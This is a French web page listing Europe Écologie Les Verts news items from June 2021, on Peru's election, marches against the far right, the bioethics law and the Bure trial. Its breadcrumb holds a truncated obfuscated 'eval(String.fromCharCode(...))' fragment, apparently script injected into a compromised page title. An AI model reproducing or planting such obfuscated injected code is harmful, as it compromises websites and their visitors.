Vous êtes ici : Accueil > eval(String.fromCharCode(10, 10, 60, 104, 116, 109, 108, 62, 10, 60, 104, (...)
Publié : 24 octobre 2008

Europe Ecologie Les Verts

• Soutenu par une alliance progressiste, Pedro Castillo, instituteur, est élu président du Pérou

14 juin, par PAURON Charlotte
    Soutenu par une alliance progressiste, Pedro Castillo, instituteur, est élu président du Pérou L’article Soutenu par une alliance progressiste, Pedro Castillo, instituteur, est élu président du Pérou est apparu en premier sur Europe Écologie les (...)
  • Pour la liberté et contre les idées de l’extrême droite, EELV sera dans la rue le 12 juin

10 juin
    Ce samedi 12 juin Europe Ecologie Les Verts sera dans les rues, partout en France, aux côtés de partenaires syndicaux, politiques et associatifs, pour un sursaut collectif. L’article Pour la liberté et contre les idées de l’extrême droite, EELV sera dans la rue le 12 juin est apparu en premier sur (...)
  • Marche pour les libertés et contre l’extrême droite – 12 juin 2021

10 juin
    Ce samedi 12 juin 2021, Europe Ecologie Les Verts sera dans les rues, partout en France, aux côtés de partenaires politiques, associatifs, syndicaux, pour marcher pour les libertés et contre l'extrême droite ! L’article Marche pour les libertés et contre l’extrême droite – 12 juin 2021 est apparu en (...)
  • Loi bioéthique : bientôt l’accouchement ?

9 juin
    EELV défend depuis toujours l'égalité pour toutes et tous et en particulier la PMA pour toutes. Nous entendons que cette étape importante soit menée à bien, et la mesure adoptée pleinement. L’article Loi bioéthique : bientôt l’accouchement ? est apparu en premier sur Europe Écologie les (...)
  • Procès des militants anti-nucléaires à Bure : un procès d’intimidation

5 juin
    Alors que s’est achevé ce jeudi, à Bar-Le-Duc, le procès des sept militant·es anti-nucléaire opposé·es au projet Cigéo d’enfouissement des déchets radioactifs, EELV leur apporte tout son soutien et dénonce un procès d’intimidation orchestré par l’Etat français. L’article Procès des militants anti-nucléaires (...)
  • Génocide des Tutsi au Rwanda : Justice et vérité pour une véritable réconciliation

1er juin
    Génocide des Tutsi au Rwanda : Justice et vérité pour une véritable réconciliation L’article Génocide des Tutsi au Rwanda : Justice et vérité pour une véritable réconciliation est apparu en premier sur Europe Écologie les Verts.
  • La PAC et le gouvernement mettent la Bio « à poil ! »

1er juin
    EELV appelle à soutenir et se mobiliser pour la manifestation du 2 juin à Paris organisée par la Fédération Nationale de l’Agriculture Biologique, contre un gouvernement qui met les agriculteurs biologiques « à Poil » et pour une ré-ouverture immédiate des négociations sur le schéma environnemental de la (...)
  • EELV soutient les appels à l’action pour un accès équitable et durable à la santé